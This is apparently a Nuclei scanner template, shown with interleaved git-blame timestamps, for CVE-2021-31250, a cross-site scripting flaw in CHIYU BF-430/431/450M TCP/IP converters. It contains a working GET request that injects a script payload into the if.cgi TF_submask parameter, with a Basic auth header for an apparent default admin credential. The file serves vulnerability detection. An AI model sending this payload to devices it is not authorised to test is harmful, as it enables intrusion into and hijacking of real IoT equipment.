2021-07-26 17:18:45 +00:00
id : CVE-2021-31250
info :
2022-08-29 13:55:23 +00:00
name : CHIYU TCP/IP Converter - Cross-Site Scripting
2021-07-26 17:18:45 +00:00
author : geeknik
severity : medium
2022-08-29 13:55:23 +00:00
description : CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation : |
To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.
2022-04-22 10:38:41 +00:00
reference :
- https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
2022-05-17 09:18:12 +00:00
- https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm
- https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-31250
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.4
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-31250
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.97079
2024-01-14 13:49:27 +00:00
epss-percentile : 0.99724
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : chiyu-tech
product : bf-430_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech
2021-07-26 17:18:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-26 17:18:45 +00:00
- method : GET
path :
- "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
2023-07-11 19:49:27 +00:00
headers :
Authorization : Basic OmFkbWlu
2022-10-07 21:27:25 +00:00
host-redirects : true
2023-07-11 19:49:27 +00:00
2021-07-26 17:18:45 +00:00
matchers-condition : and
matchers :
- type : word
part : header
words :
2023-07-11 19:49:27 +00:00
- text/html
2021-07-26 17:18:45 +00:00
- type : word
part : body
words :
2023-07-11 19:49:27 +00:00
- '"><script>alert({{randstr}})</script>'
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100810894adfb469036d6eab58382a9b2bf537deac298e2ea4091c823685d6fc78102210086f748ae81dd4e3f92ceb7a74a89abca17cd19093315b4586aa418d95e5534bb:922c64590222798bb761d5b6d8e72950